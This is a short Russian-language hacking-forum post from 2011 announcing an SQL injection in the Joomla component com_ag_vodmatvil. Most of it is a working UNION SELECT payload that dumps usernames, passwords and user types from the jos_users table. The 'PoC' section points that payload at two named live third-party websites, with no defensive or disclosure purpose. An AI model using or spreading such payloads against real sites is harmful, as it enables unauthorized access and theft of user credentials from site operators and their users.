Показать сообщение отдельно
Старый 02.08.2011, 11:51   #25
z0mbyak
 
Регистрация: 10.11.2010
Сообщений: 21
Репутация: 11
Exclamation Joomla com_ag_vodmatvil SQl-Inj

#Продукт: com_ag_vodmatvil
#Тип: SQL-Inj
#Автор: z0mbyak

#exploit: /index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat(username,0x3a,passwo rd,0x3a,usertype),3+from+jos_users--&Itemid=20

PoC:

http://tube.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20

http://vod.solo.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20
P.S. Вот, блин, мне делать нефиг)

Специально для forum.antichat.ru и rdot.org/forum/
z0mbyak вне форума   Ответить с цитированием